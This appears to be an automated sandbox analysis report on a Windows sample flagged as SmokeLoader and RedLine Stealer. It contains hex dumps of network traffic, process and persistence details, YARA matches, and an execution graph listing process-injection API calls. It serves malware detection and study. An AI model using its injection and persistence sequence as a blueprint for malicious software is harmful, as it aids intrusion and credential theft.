                                                          2024-10-12 20:29:01 UTC8000INData Raw: f3 8c 62 71 d5 03 48 9a 65 02 a2 be 38 63 4a cd 4b 5a a0 64 dd b4 1c 1b 17 cc fa 9d db 7f fa cd c0 fd cb 94 41 3d d3 dd e6 45 97 57 6a a2 d3 23 87 5f 84 9d 6b 60 4f fc b8 56 3a 78 51 c3 bc 5e 59 94 7e 17 45 7d e1 26 14 2b d1 5e d8 06 65 39 9c 8b 51 1c 90 bd 03 85 24 6c 82 f6 9a f9 22 80 6f c8 32 0a 83 6f 9f 83 46 2e 6c b4 a3 6a 7b 72 99 b7 be 1e 54 4b 3f 75 74 af 07 05 68 18 83 14 71 f7 13 8e 52 56 c8 8c b4 46 a1 f8 cf 78 16 ae 7e 0c 67 a5 8f 57 d3 68 a3 9b d9 f5 65 46 dc d9 34 78 43 06 92 ea 5b 88 6d 3a de d5 51 01 25 97 e0 72 af eb 46 b4 ee 0c 02 1a 15 18 90 db e9 e0 05 96 cf a2 3d a4 f5 cd ba 14 55 34 57 f2 76 0b 72 75 99 91 fd b7 a8 15 9f a6 57 84 b9 08 14 a8 96 80 6a af ab e8 96 d4 a6 c0 b4 34 b4 d0 5f f3 d6 de d1 01 02 a3 be fa c3 b0 c8 f8 c6 e2 d0
                                                          Data Ascii: bqHe8cJKZdA=EWj#_k`OV:xQ^Y~E}&+^e9Q$l"o2oF.lj{rTK?uthqRVFx~gWheF4xC[m:Q%rF=U4WvruWj4_
                                                          2024-10-12 20:29:01 UTC8000INData Raw: 80 a9 14 06 dc b3 44 d6 e5 16 61 04 d0 bf f1 24 db 5e 01 45 81 c1 2b 92 e6 3e d3 85 ec 9a 31 ef de b7 c0 70 43 80 87 5b ed 4b 49 b5 b9 66 d7 5f 24 6c 72 ba 46 f5 76 97 1e 3b fe ee a9 2e df a3 92 4d cd 13 bc 78 3a bd e4 8e ff d5 7a cb c1 64 c1 ef d5 f2 54 6d f8 3a 5e b5 e3 fa 47 ca 76 58 d1 43 bf f0 3a f4 81 fc 9a cd 13 c4 3a 2f 2e 0d fc 4d 33 64 0b f4 71 35 94 f0 55 a0 7f fb ae d5 ca c8 93 47 f2 0e 48 92 ae 75 2d 91 3b 2d cd 69 ea ba c9 10 9b 33 d5 3f 26 91 b4 00 0c ab ae 81 01 61 b8 0e 4e 43 c2 c8 fa dd 11 7d 10 7c f6 d2 3d f3 8a 74 84 73 8a 38 8b 51 1e b9 5b 9d 8e 8f ac 15 0e 00 22 aa 55 8c 45 e6 6c f3 86 68 e1 b4 0c 66 c6 b6 25 3a 70 9b 47 4b 6a c5 df b6 51 c5 4d d4 51 63 f1 03 c8 4e c7 64 f0 c0 b8 2e 48 64 c0 a2 69 ea a6 18 84 1d da 44 5b a8 e1 19 3f
                                                          Data Ascii: Da$^E+>1pC[KIf_$lrFv;.Mx:zdTm:^GvXC::/.M3dq5UGHu-;-i3?&aNC}|=ts8Q["UElhf%:pGKjQMQcNd.HdiD[?
                                                          2024-10-12 20:29:01 UTC8000INData Raw: 0c 74 b8 8f 0c aa 9c cc fe ef 22 7e 3a 89 62 e2 81 2c 48 4a e8 d7 87 b2 dd 9e 85 b9 dd 2a 82 b3 ea f1 45 b0 97 76 fa 99 dc 98 ab b9 67 50 14 4d fa 26 a7 32 4b c1 e4 71 d7 62 d5 fe a0 af 2e 9f 9e ab be 03 22 e5 3a fb 61 0e 0d c5 a6 4e 82 07 43 27 0a 65 a3 0b 94 07 27 5d e6 61 eb 4e 06 10 91 74 06 e7 7d af d6 ec b3 2f be 97 42 c4 db 3b 5e 52 75 f5 98 77 36 a3 8a fd e2 7f 47 6a ef a8 ad 73 87 66 1f ac 9c 3f b1 73 cb bf 2a d5 51 0a 98 8d 62 c0 3a f8 6f 65 7f fa 62 9a 87 15 8c 28 ef 40 2f a0 34 28 20 a7 2c 30 4a fa 3f 30 72 5f 8c ab 91 31 75 fa bc 86 43 17 90 1a d8 43 29 27 54 0e 64 52 c4 55 55 c5 2c 9f f7 08 51 7b f7 fc 59 c6 48 11 7b 6f b1 e8 3d f0 4e 15 32 42 09 8b e9 b2 f1 f7 ca 4b 83 89 7f aa 1d 81 ea fd b0 9f db f3 10 e5 0a 63 60 81 ab 3b 41 b0 8b 4e 03
                                                          Data Ascii: t"~:b,HJ*EvgPM&2Kqb.":aNC'e']aNt}/B;^Ruw6Gjsf?s*Qb:oeb(@/4( ,0J?0r_1uCC)'TdRUU,Q{YH{o=N2BKc`;AN
                                                          2024-10-12 20:29:01 UTC8000INData Raw: 29 3b 52 75 45 38 61 da f5 8b 4b 1b 49 04 39 48 65 38 b2 34 2a 88 7b 38 83 49 ff 73 4f d0 2b e1 e2 45 5a 9d d3 a6 67 63 85 e7 5f 54 4a f3 a0 01 a4 d0 04 1b ea e0 ca ef 02 f6 16 f6 6e f5 0c 74 f0 e5 0b 3d cd 58 73 c8 3d ff 47 50 25 79 61 74 09 6e 68 c2 9e 97 88 99 ce 46 98 24 73 03 46 dc 30 24 1e 0a d5 e0 54 88 22 ba f7 6c b4 de ed c2 ac f0 fe 7a c7 e3 a6 d0 a5 d0 14 97 a8 09 82 ce 17 78 34 ae a9 a3 67 bf a2 1b 5f 2d be 98 f5 b5 7b 67 a6 32 31 ad 81 eb 4b 35 85 6e 05 d9 02 11 11 41 0f 41 72 78 0d 91 f3 e8 8d e2 0f 7d c4 51 11 b9 f1 ef 9a 7b 31 a4 a6 46 bd 62 93 91 72 a5 30 ad f0 58 12 bd 2b 8d a5 d8 64 d0 b9 8d 4e b5 c4 64 48 72 d2 9b a2 46 3f fb 58 42 a2 4d 65 4a ee 9f 4d 24 c9 68 7e 38 02 cd f2 3e 87 74 38 e2 08 b5 db 69 50 c1 8d c3 a8 79 6c 2e fd 35 9e
                                                          Data Ascii: );RuE8aKI9He84*{8IsO+EZgc_TJnt=Xs=GP%yatnhF$sF0$T"lzx4g_-{g21K5nAArx}Q{1Fbr0X+dNdHrF?XBMeJM$h~8>t8iPyl.5
                                                          2024-10-12 20:29:01 UTC8000INData Raw: 58 a8 ea f1 35 7e b4 f4 db 12 c6 82 54 f8 45 ac 48 8d 3b a5 ca 75 c7 7a 4a 57 56 2f 30 aa e7 f7 1c e2 b2 b4 88 52 22 f4 e6 ca 13 7d a8 77 50 62 eb 5a 71 09 e0 08 f7 19 71 d3 40 ac b5 d5 86 2a a0 a1 18 c2 27 3d 8d 29 c4 8d bc f3 b8 49 e5 2b 42 7f 1a ba 2c 14 08 0e 1b 00 46 0c 80 de 9d d8 bb ea cb 51 90 40 0a b0 80 6b 76 3e 77 5b 7c 4a 60 b1 21 68 d6 63 67 07 21 4c 35 a0 9e 4a 5c f5 5a 68 1c d1 d3 91 7a 4d de 12 2f 31 da 50 1a c1 01 dd dd 2f 38 db 1f e1 7a b6 94 c4 26 66 3e e4 42 2b e8 fc a9 1a 91 c3 d9 7b 50 bc 23 24 9e dd 74 92 23 50 45 a0 8f b0 4f 16 2a 67 f7 ef 42 43 17 f2 0d 76 51 d4 52 5b 85 b0 60 53 10 ef ef 27 c5 ae dd f5 d9 8e c2 1d 4b 6f fd d4 18 ee 49 62 9c 7e 16 ab 15 8b 14 b3 26 0c b3 7a ac 8f d9 1b 56 ec 7e 5a 43 9e 5b 68 03 8a bb da 4a 02 3f
                                                          Data Ascii: X5~TEH;uzJWV/0R"}wPbZqq@*'=)I+B,FQ@kv>w[|J`!hcg!L5J\ZhzM/1P/8z&f>B+{P#$t#PEO*gBCvQR[`S'KoIb~&zV~ZC[hJ?
                                                          2024-10-12 20:29:01 UTC8000INData Raw: 44 40 52 05 3a 72 2f 6e 1b 0e 08 b5 d9 d9 9f 71 d4 47 68 33 1c 5a bc de 17 52 e4 12 b5 9d 6d 77 f7 60 02 46 3c 21 16 db f7 1b 4d 3f 05 3c ad 0f 22 24 8c 8d 47 32 a9 19 0d 8f a2 36 9e fc 72 45 07 cf 5b 55 84 3c de f0 ee 9a 99 0e 24 52 c2 8a 3d 67 6a 26 29 68 1c ac a6 63 38 8e da 40 e2 43 59 b4 22 39 f2 92 ff 4d 65 4f 36 4b 57 8f 10 ec f0 44 c5 25 2b d5 71 d5 7c 17 01 ee 42 10 42 84 31 c1 12 33 9e 97 46 b0 40 93 f7 9e fb c9 0b 85 b0 07 01 d0 bc 00 aa 78 c6 60 4d 11 42 8a 1b d8 08 08 2c 9b 54 6f 53 7a d2 fd 7b e9 fe 76 7b af 59 04 77 4a 74 6c f7 73 ee b1 00 74 d8 9e 6f db 01 3a e9 6b 3e 05 32 13 f8 c7 a9 aa 9b 29 89 02 6d 7b 7d 6f 8e 15 a1 57 ce ba 3f 36 09 c0 87 83 83 f9 f7 76 f7 87 bf c6 ec 19 3c 0a ec 6e 27 d9 20 2f 96 e7 90 40 de aa b7 43 f8 89 c9 ab e2
                                                          Data Ascii: D@R:r/nqGh3ZRmw`F<!M?<"$G26rE[U<$R=gj&)hc8@CY"9MeO6KWD%+q|BB13F@x`MB,ToSz{v{YwJtlsto:k>2)m{}oW?6v<n' /@C


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:16:28:02
                                                          Start date:12/10/2024
                                                          Path:C:\Users\user\Desktop\file.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                          Imagebase:0x400000
                                                          File size:243'200 bytes
                                                          MD5 hash:F0342947877C844A5C82CB4BB5FDADAD
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1818628832.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1818628832.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1818742060.0000000002DB7000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1818859603.0000000002EF1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1818859603.0000000002EF1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1818600751.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:1
                                                          Start time:16:28:12
                                                          Start date:12/10/2024
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Explorer.EXE
                                                          Imagebase:0x7ff72b770000
                                                          File size:5'141'208 bytes
                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:5
                                                          Start time:16:28:32
                                                          Start date:12/10/2024
                                                          Path:C:\Users\user\AppData\Roaming\trbwcit
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\trbwcit
                                                          Imagebase:0x400000
                                                          File size:243'200 bytes
                                                          MD5 hash:F0342947877C844A5C82CB4BB5FDADAD
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2089545393.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2089545393.0000000002CF1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2089476769.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2089645639.0000000002D57000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2089499262.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2089499262.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 37%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:6
                                                          Start time:16:29:01
                                                          Start date:12/10/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\565.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Local\Temp\565.exe
                                                          Imagebase:0x400000
                                                          File size:242'688 bytes
                                                          MD5 hash:F42E9B6758241070E7815B8BD1EB8335
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2387106180.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2387169374.0000000002C21000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2387169374.0000000002C21000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2387276728.0000000002C67000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2387127676.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2387127676.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:16:29:28
                                                          Start date:12/10/2024
                                                          Path:C:\Users\user\AppData\Roaming\fgbwcit
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\fgbwcit
                                                          Imagebase:0x400000
                                                          File size:242'688 bytes
                                                          MD5 hash:F42E9B6758241070E7815B8BD1EB8335
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.2686603157.0000000002C37000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000008.00000002.2686820373.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2686854364.0000000002E90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2686854364.0000000002E90000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2687018881.0000000003001000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2687018881.0000000003001000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:9
                                                          Start time:16:30:01
                                                          Start date:12/10/2024
                                                          Path:C:\Users\user\AppData\Roaming\trbwcit
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\trbwcit
                                                          Imagebase:0x400000
                                                          File size:243'200 bytes
                                                          MD5 hash:F0342947877C844A5C82CB4BB5FDADAD
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:10
                                                          Start time:16:30:02
                                                          Start date:12/10/2024
                                                          Path:C:\Users\user\AppData\Roaming\fgbwcit
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\fgbwcit
                                                          Imagebase:0x400000
                                                          File size:242'688 bytes
                                                          MD5 hash:F42E9B6758241070E7815B8BD1EB8335
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:false

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:9.4%
                                                            Dynamic/Decrypted Code Coverage:29.4%
                                                            Signature Coverage:42.9%
                                                            Total number of Nodes:163
                                                            Total number of Limit Nodes:7
                                                            execution_graph 3390 402e40 3392 402e37 3390->3392 3393 402edf 3392->3393 3394 4018e6 3392->3394 3395 4018f5 3394->3395 3396 40192e Sleep 3395->3396 3397 401949 3396->3397 3399 40195a 3397->3399 3400 401514 3397->3400 3399->3393 3401 401524 3400->3401 3402 4016e0 3401->3402 3403 4015c4 NtDuplicateObject 3401->3403 3402->3399 3403->3402 3404 4015e1 NtCreateSection 3403->3404 3405 401661 NtCreateSection 3404->3405 3406 401607 NtMapViewOfSection 3404->3406 3405->3402 3408 40168d 3405->3408 3406->3405 3407 40162a NtMapViewOfSection 3406->3407 3407->3405 3409 401648 3407->3409 3408->3402 3410 401697 NtMapViewOfSection 3408->3410 3409->3405 3410->3402 3411 4016be NtMapViewOfSection 3410->3411 3411->3402 3412 415f60 3415 415b60 3412->3415 3414 415f65 3416 415b6d 3415->3416 3417 415d50 3416->3417 3418 415c27 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW 3416->3418 3419 415d60 SetCommState 3417->3419 3423 415d79 3417->3423 3420 415c8d 7 API calls 3418->3420 3419->3417 3421 415d41 3420->3421 3422 415d3a PulseEvent 3420->3422 3421->3417 3422->3421 3424 415e46 3423->3424 3425 415d86 7 API calls 3423->3425 3436 4157b0 LocalAlloc 3424->3436 3427 415e1a 3425->3427 3427->3424 3430 415e9d 3438 415ad0 3430->3438 3431 415e4b LoadLibraryA 3437 4157e0 GetModuleHandleW GetProcAddress VirtualProtect 3431->3437 3433 415ea2 3434 415ed9 InterlockedDecrement 3433->3434 3435 415eef 3433->3435 3434->3433 3435->3414 3436->3431 3437->3430 3439 415af9 QueryDosDeviceW 3438->3439 3440 415b0a 3438->3440 3439->3440 3449 415970 3440->3449 3443 415b25 3452 4159b0 3443->3452 3444 415b1d FreeEnvironmentStringsA 3444->3443 3447 415b4c 3447->3433 3448 415b3c HeapDestroy GetNumaHighestNodeNumber 3448->3447 3450 415981 FatalAppExitA GetModuleHandleW 3449->3450 3451 415993 3449->3451 3450->3451 3451->3443 3451->3444 3453 4159bd 3452->3453 3454 4159e9 3453->3454 3455 4159d8 BuildCommDCBA 3453->3455 3456 4159f1 WritePrivateProfileStringA FreeEnvironmentStringsA 3454->3456 3459 415a13 3454->3459 3455->3459 3456->3459 3457 415a9a 3457->3447 3457->3448 3459->3457 3460 415a49 GetNumaAvailableMemoryNode GetComputerNameW SetCalendarInfoA OpenJobObjectA GetShortPathNameW 3459->3460 3461 4159a0 3459->3461 3460->3459 3464 415930 3461->3464 3465 415959 3464->3465 3466 41594c SetEvent 3464->3466 3465->3459 3466->3465 3562 401542 3563 40153b 3562->3563 3564 4015c4 NtDuplicateObject 3563->3564 3573 4016e0 3563->3573 3565 4015e1 NtCreateSection 3564->3565 3564->3573 3566 401661 NtCreateSection 3565->3566 3567 401607 NtMapViewOfSection 3565->3567 3569 40168d 3566->3569 3566->3573 3567->3566 3568 40162a NtMapViewOfSection 3567->3568 3568->3566 3570 401648 3568->3570 3571 401697 NtMapViewOfSection 3569->3571 3569->3573 3570->3566 3572 4016be NtMapViewOfSection 3571->3572 3571->3573 3572->3573 3467 2d8003c 3468 2d80049 3467->3468 3480 2d80e0f SetErrorMode SetErrorMode 3468->3480 3473 2d80265 3474 2d802ce VirtualProtect 3473->3474 3476 2d8030b 3474->3476 3475 2d80439 VirtualFree 3477 2d804be LoadLibraryA 3475->3477 3476->3475 3479 2d808c7 3477->3479 3481 2d80223 3480->3481 3482 2d80d90 3481->3482 3483 2d80dad 3482->3483 3484 2d80dbb GetPEB 3483->3484 3485 2d80238 VirtualAlloc 3483->3485 3484->3485 3485->3473 3621 402dd0 3622 402ddc 3621->3622 3623 4018e6 8 API calls 3622->3623 3624 402edf 3622->3624 3623->3624 3517 4018f1 3518 4018f6 3517->3518 3519 40192e Sleep 3518->3519 3520 401949 3519->3520 3521 401514 7 API calls 3520->3521 3522 40195a 3520->3522 3521->3522 3625 415792 3626 41579b GetModuleHandleW GetProcAddress VirtualProtect 3625->3626 3486 2dba68e 3487 2dba69d 3486->3487 3490 2dbae2e 3487->3490 3495 2dbae49 3490->3495 3491 2dbae52 CreateToolhelp32Snapshot 3492 2dbae6e Module32First 3491->3492 3491->3495 3493 2dbae7d 3492->3493 3496 2dba6a6 3492->3496 3497 2dbaaed 3493->3497 3495->3491 3495->3492 3498 2dbab18 3497->3498 3499 2dbab29 VirtualAlloc 3498->3499 3500 2dbab61 3498->3500 3499->3500 3500->3500 3608 401915 3609 40191a 3608->3609 3610 4018c6 3608->3610 3611 40192e Sleep 3609->3611 3612 401949 3611->3612 3613 401514 7 API calls 3612->3613 3614 40195a 3612->3614 3613->3614 3501 402f97 3502 4030ee 3501->3502 3503 402fc1 3501->3503 3503->3502 3504 40307c RtlCreateUserThread NtTerminateProcess 3503->3504 3504->3502 3536 2d80001 3537 2d80005 3536->3537 3542 2d8092b GetPEB 3537->3542 3539 2d80030 3544 2d8003c 3539->3544 3543 2d80972 3542->3543 3543->3539 3545 2d80049 3544->3545 3546 2d80e0f 2 API calls 3545->3546 3547 2d80223 3546->3547 3548 2d80d90 GetPEB 3547->3548 3549 2d80238 VirtualAlloc 3548->3549 3550 2d80265 3549->3550 3551 2d802ce VirtualProtect 3550->3551 3553 2d8030b 3551->3553 3552 2d80439 VirtualFree 3554 2d804be LoadLibraryA 3552->3554 3553->3552 3556 2d808c7 3554->3556 3598 402d7b 3599 402d38 3598->3599 3599->3598 3600 402dc7 3599->3600 3601 4018e6 8 API calls 3599->3601 3601->3600 3557 2d80005 3558 2d8092b GetPEB 3557->3558 3559 2d80030 3558->3559 3560 2d8003c 7 API calls 3559->3560 3561 2d80038 3560->3561 3523 4014fe 3524 401506 3523->3524 3525 401531 3523->3525 3526 4015c4 NtDuplicateObject 3525->3526 3530 4016e0 3525->3530 3527 4015e1 NtCreateSection 3526->3527 3526->3530 3528 401661 NtCreateSection 3527->3528 3529 401607 NtMapViewOfSection 3527->3529 3528->3530 3532 40168d 3528->3532 3529->3528 3531 40162a NtMapViewOfSection 3529->3531 3531->3528 3533 401648 3531->3533 3532->3530 3534 401697 NtMapViewOfSection 3532->3534 3533->3528 3534->3530 3535 4016be NtMapViewOfSection 3534->3535 3535->3530

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 415b60-415b88 2 415b90-415b97 0->2 3 415b99-415b9b 2->3 4 415b9f-415ba5 2->4 3->4 5 415ba7-415bb1 4->5 6 415bb6-415bc0 4->6 5->6 7 415bc2-415bce 6->7 8 415bd8-415bdf 6->8 7->8 8->2 9 415be1-415be9 8->9 11 415bf0-415bf6 9->11 12 415c04-415c0b 11->12 13 415bf8-415bfe 11->13 14 415c11-415c18 12->14 15 415c0d 12->15 13->12 14->11 16 415c1a-415c21 14->16 15->14 17 415d50-415d5e 16->17 18 415c27-415d38 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW SetDefaultCommConfigW MoveFileW GetVersionExW DisconnectNamedPipe ReadConsoleOutputW GetModuleFileNameA LCMapStringA 16->18 19 415d60-415d6e SetCommState 17->19 22 415d41-415d4d 18->22 23 415d3a-415d3b PulseEvent 18->23 24 415d70-415d77 19->24 25 415d79-415d80 19->25 22->17 23->22 24->19 24->25 27 415e46-415e55 call 4157b0 25->27 28 415d86-415e40 GetConsoleAliasesLengthA GetStringTypeExW BuildCommDCBA GetTimeFormatW GetFileAttributesA GetConsoleAliasExesLengthA GetBinaryType 25->28 33 415e57-415e68 27->33 34 415e8d-415e98 LoadLibraryA call 4157e0 27->34 28->27 36 415e70-415e80 33->36 38 415e9d-415eae call 415ad0 34->38 39 415e82 36->39 40 415e88-415e8b 36->40 45 415eb0-415eb7 38->45 39->40 40->34 40->36 46 415ec3-415ec9 45->46 47 415eb9-415ebf 45->47 49 415ed0-415ed7 46->49 50 415ecb call 4157d0 46->50 47->46 53 415ee6-415eed 49->53 54 415ed9-415ee0 InterlockedDecrement 49->54 50->49 53->45 56 415eef-415eff 53->56 54->53 57 415f00-415f10 56->57 58 415f12 57->58 59 415f19-415f1c 57->59 58->59 59->57 60 415f1e-415f29 59->60 61 415f30-415f35 60->61 62 415f37-415f3d 61->62 63 415f3f-415f45 61->63 62->63 64 415f47-415f54 62->64 63->61 63->64
                                                            APIs
                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415C32
                                                            • ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00415C4B
                                                            • FindAtomW.KERNEL32(00000000), ref: 00415C52
                                                            • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00415C5A
                                                            • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415C72
                                                            • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00415C99
                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00415CA1
                                                            • GetVersionExW.KERNEL32(?), ref: 00415CAE
                                                            • DisconnectNamedPipe.KERNEL32(?), ref: 00415CC1
                                                            • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00415D06
                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415D15
                                                            • LCMapStringA.KERNEL32(00000000,00000000,004173C0,00000000,?,00000000), ref: 00415D2B
                                                            • PulseEvent.KERNEL32(00000000), ref: 00415D3B
                                                            • SetCommState.KERNELBASE(00000000,00000000), ref: 00415D64
                                                            • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415D95
                                                            • GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415DA6
                                                            • BuildCommDCBA.KERNEL32(00000000,00000000), ref: 00415DAE
                                                            • GetTimeFormatW.KERNEL32(00000000,00000000,?,004173EC,?,00000000), ref: 00415DEE
                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00415DF5
                                                            • GetConsoleAliasExesLengthA.KERNEL32 ref: 00415DFB
                                                            • GetBinaryType.KERNEL32(0041742C,?), ref: 00415E0D
                                                            • LoadLibraryA.KERNELBASE(00417438), ref: 00415E92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1817408197.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                            Similarity
                                                            • API ID: Console$CommFile$LengthReadStringType$AliasAliasesAtomAttributesBinaryBuildCompareConfigDefaultDisconnectEventExchangeExesFindFormatInterlockedLibraryLoadModeModuleMoveNameNamedOutputPathPipePulseSearchStateTimeVersion
                                                            • String ID: k`$}$
                                                            • API String ID: 2545807588-956986773
                                                            • Opcode ID: c39809a0e87fd44c053065795a214b46b35c2f87788abebbe67deec486c5fac3
                                                            • Instruction ID: c6a02c0327a8ca2811bf3dc5f08980216b947ce058d02ad4a82b71acd99ee3cb
                                                            • Opcode Fuzzy Hash: c39809a0e87fd44c053065795a214b46b35c2f87788abebbe67deec486c5fac3
                                                            • Instruction Fuzzy Hash: 4FA10271802A24DBC720DB64EC48ADB7B79FF89351F41406AF50AA7150DB385A81CFAD

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
